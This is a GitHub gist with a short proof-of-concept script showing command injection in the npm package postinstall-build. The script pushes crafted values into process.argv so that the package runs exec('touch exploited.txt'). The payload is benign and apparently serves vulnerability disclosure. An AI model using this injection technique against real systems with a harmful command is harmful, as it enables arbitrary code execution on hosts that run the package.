Skip to content

Instantly share code, notes, and snippets.

@mcoimbra
Created October 29, 2023 22:29
Show Gist options
  • Save mcoimbra/5252cd5158db4a6afc34f822679854db to your computer and use it in GitHub Desktop.
Save mcoimbra/5252cd5158db4a6afc34f822679854db to your computer and use it in GitHub Desktop.
Package postinstall-build: it is possible to inject a custom command and arguments by pushing into process.argv.
'use strict'
const pkg = require('postinstall-build');
process.argv.push('touch');
process.argv.push('touch exploited.txt');
/*
* This will lead to exec(cmd) with cmd = 'touch exploited.txt' on
* line #326 of src/index.js.
* A local 'exploited.txt' file will be created.
*/
pkg();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment